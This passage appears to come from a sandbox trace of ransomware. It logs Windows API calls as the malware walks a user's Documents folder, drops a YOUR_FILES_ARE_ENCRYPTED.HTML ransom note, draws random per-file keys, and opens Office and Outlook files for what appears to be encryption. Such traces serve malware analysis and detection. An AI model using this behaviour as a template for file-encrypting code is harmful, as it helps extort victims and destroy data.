(in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="98") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B1") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E7") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="39") returned 2 [0167.200] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" [0167.200] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.200] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.201] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28ca3ae0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x28ca3ae0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x82a61770, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="norman@gdllo.de.pst", cAlternateFileName="NORMAN~1.PST")) returned 0 [0167.201] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.201] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0167.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook 
Files\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\outlook files\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.217] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.219] CloseHandle (hObject=0x5ac) returned 1 [0167.219] GetProcessHeap () returned 0x270000 [0167.221] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c329420, ftCreationTime.dwHighDateTime=0x1d7df57, ftLastAccessTime.dwLowDateTime=0x9ca39d70, ftLastAccessTime.dwHighDateTime=0x1d7e5a2, ftLastWriteTime.dwLowDateTime=0x9ca39d70, ftLastWriteTime.dwHighDateTime=0x1d7e5a2, nFileSizeHigh=0x0, nFileSizeLow=0x133a3, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="rW24XMo g3EfMKuXFXbo.docx", cAlternateFileName="RW24XM~1.DOC")) returned 1 [0167.221] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx") returned 59 [0167.221] lstrcmpW (lpString1="rW24XMo g3EfMKuXFXbo.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.221] PathFindExtensionW (pszPath="rW24XMo g3EfMKuXFXbo.docx") returned=".docx" [0167.221] lstrlenW (lpString=".docx") returned 5 [0167.221] PathFindExtensionW (pszPath="rW24XMo g3EfMKuXFXbo.docx") returned=".docx" [0167.221] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.221] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\rw24xmo g3efmkuxfxbo.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.222] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78755) returned 1 [0167.222] GetProcessHeap () returned 0x270000 [0167.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.223] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="37") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="AA") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A6") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="4B") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8C") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="FF") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5D") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="74") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5F") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A1") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="91") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F9") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="5E") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="03") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="37") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd7e, 
param_2="%02X" | out: param_1="66") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="E0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5F") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CA") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A9") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="A6") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="52") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="82") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="57") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="00") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="72") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EC") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6F") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="25") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="69") returned 2 [0167.225] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" [0167.225] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.225] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.227] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5d2d10, ftCreationTime.dwHighDateTime=0x1d7e46b, ftLastAccessTime.dwLowDateTime=0x7b21cc50, ftLastAccessTime.dwHighDateTime=0x1d7e53c, ftLastWriteTime.dwLowDateTime=0x7b21cc50, ftLastWriteTime.dwHighDateTime=0x1d7e53c, nFileSizeHigh=0x0, nFileSizeLow=0x12145, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="skHn.docx", cAlternateFileName="SKHN~1.DOC")) returned 1 [0167.227] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx") returned 43 [0167.227] lstrcmpW (lpString1="skHn.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.227] PathFindExtensionW (pszPath="skHn.docx") returned=".docx" [0167.232] lstrlenW (lpString=".docx") returned 5 [0167.232] PathFindExtensionW (pszPath="skHn.docx") returned=".docx" [0167.232] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\skhn.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.237] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=74053) returned 1 [0167.237] GetProcessHeap () returned 0x270000 [0167.237] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.238] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="25") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="E2") returned 2 
[0167.238] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="1F") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="87") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1A") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7C") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="1D") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="5F") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="87") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="78") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="D8") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="8A") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="3A") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="30") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="00") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F5") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FC") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="1E") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="03") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="49") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="0A") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CD") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="C7") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: 
param_1="BE") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E9") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="74") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="61") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="9C") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="11") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="01") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4C") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="44") returned 2 [0167.240] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" [0167.240] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.240] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f68170, ftCreationTime.dwHighDateTime=0x1d7b9f5, ftLastAccessTime.dwLowDateTime=0x4caa3610, ftLastAccessTime.dwHighDateTime=0x1d7bbbf, ftLastWriteTime.dwLowDateTime=0x4caa3610, ftLastWriteTime.dwHighDateTime=0x1d7bbbf, nFileSizeHigh=0x0, nFileSizeLow=0xda7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VO8vnxVyqWP zR.xlsx", cAlternateFileName="VO8VNX~1.XLS")) returned 1 [0167.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx") returned 53 [0167.250] lstrcmpW (lpString1="VO8vnxVyqWP zR.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.250] PathFindExtensionW (pszPath="VO8vnxVyqWP zR.xlsx") returned=".xlsx" [0167.250] lstrlenW (lpString=".xlsx") returned 5 [0167.250] PathFindExtensionW (pszPath="VO8vnxVyqWP zR.xlsx") returned=".xlsx" [0167.250] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\vo8vnxvyqwp zr.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.251] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=3495) returned 1 [0167.251] GetProcessHeap () returned 0x270000 [0167.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.252] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="91") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="FA") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1C") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B8") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D9") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2A") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="B9") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | 
out: param_1="A7") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B2") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="2C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FC") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="EC") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="D6") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="69") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="EF") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F5") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="43") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="62") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="9B") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="70") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="68") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="0E") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="33") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EA") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="99") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="64") returned 2 [0167.254] wsprintfW (in: 
param_1=0x4ebddbe, param_2="%02X" | out: param_1="19") returned 2 [0167.254] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" [0167.254] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.264] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b28e50, ftCreationTime.dwHighDateTime=0x1d7dcb7, ftLastAccessTime.dwLowDateTime=0x825f4d50, ftLastAccessTime.dwHighDateTime=0x1d7e4e0, ftLastWriteTime.dwLowDateTime=0x825f4d50, ftLastWriteTime.dwHighDateTime=0x1d7e4e0, nFileSizeHigh=0x0, nFileSizeLow=0x157d9, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="wi9CmCQ.pptx", cAlternateFileName="WI9CMC~1.PPT")) returned 1 [0167.264] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx") returned 46 [0167.264] lstrcmpW (lpString1="wi9CmCQ.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.264] PathFindExtensionW (pszPath="wi9CmCQ.pptx") returned=".pptx" [0167.264] lstrlenW (lpString=".pptx") returned 5 [0167.264] PathFindExtensionW (pszPath="wi9CmCQ.pptx") returned=".pptx" [0167.264] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\wi9cmcq.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.265] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=88025) returned 1 [0167.265] GetProcessHeap () returned 0x270000 [0167.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.266] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E0") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="EA") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="8B") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="58") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0A") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A9") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="20") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8A") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="D9") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="71") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="9C") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="E3") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="DB") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="63") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="4E") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="43") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="98") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="07") returned 
2 [0167.267] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="CD") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="95") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="5C") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="3F") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B5") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="CA") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="70") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="04") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="40") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FB") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1B") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="CC") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="75") returned 2 [0167.268] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" [0167.268] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.268] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.276] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xbae4c400, ftCreationTime.dwHighDateTime=0x1d7d137, ftLastAccessTime.dwLowDateTime=0xa14c1e60, ftLastAccessTime.dwHighDateTime=0x1d7e688, ftLastWriteTime.dwLowDateTime=0xa14c1e60, ftLastWriteTime.dwHighDateTime=0x1d7e688, nFileSizeHigh=0x0, nFileSizeLow=0x197c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="zgPO1s6dkb.docx", cAlternateFileName="ZGPO1S~1.DOC")) returned 1 [0167.278] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx") returned 49 [0167.278] lstrcmpW (lpString1="zgPO1s6dkb.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.278] PathFindExtensionW (pszPath="zgPO1s6dkb.docx") returned=".docx" [0167.278] lstrlenW (lpString=".docx") returned 5 [0167.278] PathFindExtensionW (pszPath="zgPO1s6dkb.docx") returned=".docx" [0167.278] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\zgpo1s6dkb.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.279] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6524) returned 1 [0167.279] GetProcessHeap () returned 0x270000 [0167.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.280] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="99") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="05") returned 2 